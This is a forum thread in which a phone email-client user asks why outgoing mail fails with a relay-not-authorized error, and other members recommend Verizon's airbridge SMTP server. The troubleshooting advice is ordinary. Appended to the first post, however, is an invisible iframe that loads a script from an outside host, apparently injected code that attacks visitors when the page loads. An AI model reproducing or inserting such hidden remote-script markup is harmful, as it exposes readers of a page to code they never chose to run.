+ Reply to Thread

Can receive but not send

I have Snapper Mail set up just like my normal email program and I can receive email but not send. I get a message that "SMTP responded not OK. Failed to authorize to SMTP server on account 1. Server replied 572 Relay not authorized."

I have put the SMTP number in both places along with the user name and password. What might I be doing wrong?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Can receive but not send

Originally posted by mediapage
    I have Snapper Mail set up just like my normal email program and I can receive email but not send. I get a message that "SMTP responded not OK. Failed to authorize to SMTP server on account 1. Server replied 572 Relay not authorized."

I have put the SMTP number in both places along with the user name and password. What might I be doing wrong?
    What email service are you using? Some email providers will not accept outgoing mail when you are off their network even with authentication. Others provide a different SMTP server for external access of authorized users.

If your provider doesn't have a way for you to access from your phone, set your outgoing email to mail.airbridge.net.

Depending on where you are located, you may not need to set any authentication, you may need to set authentication, but it can be anything, you may be able to set authenticatoin using "qnc" for both the user name and password, or you may need to call Verizon's data service customer service and ask them to set up an airbridge account for you (if you do this last, they will also set up a pop3 account so you can receive mail at mail.airbridge.net). The airbridge accounts are free. For a while they were not giving them out to 7135 owners, but now that they are selling the phone that policy should have ended.

Alan

I'm going to have to set that up too-- Thanks for the reminder Alan. Will they know What I'm talking about if I just ask for an Airbridge account or do will I need to call a few times to find a smart-rep?
    iPhone therefore iAm.

Originally posted by Steve
    Will they know What I'm talking about if I just ask for an Airbridge account or do will I need to call a few times to find a smart-rep?
    lol... what do you think? I hope you luck out on the try though

Fortunately for me my company has a special smtp address and port that allow for relaying.
    Please visit my picture site: Robert-O-Rama :)

I'm going to have to set that up too-- Thanks for the reminder Alan. Will they know What I'm talking about if I just ask for an Airbridge account or do will I need to call a few times to find a smart-rep?

Steve,
    You should be able to jsut input the mail.airbridge.net into the SMTP server, and it should work. I called 'em no one knew anything about setting up an account (big shock) they said to just put that in and it should work (it did for me)

Hope this helps!

Tom
    To most people, the sky is the limit.
    To those who love flight, the sky is home

Well what about getting the free pop3 account?
    iPhone therefore iAm.

Thanks for the airbridge.net

Thanks Alan for the airbridge server, it worked right away and I will see if if stops my problem for good.

One thing about this list is that you get answers back right away and they are usually right on the money. Thanks all.

Well what about getting the free pop3 account?
    If you call the data support number they should know what you are talking about.

Alan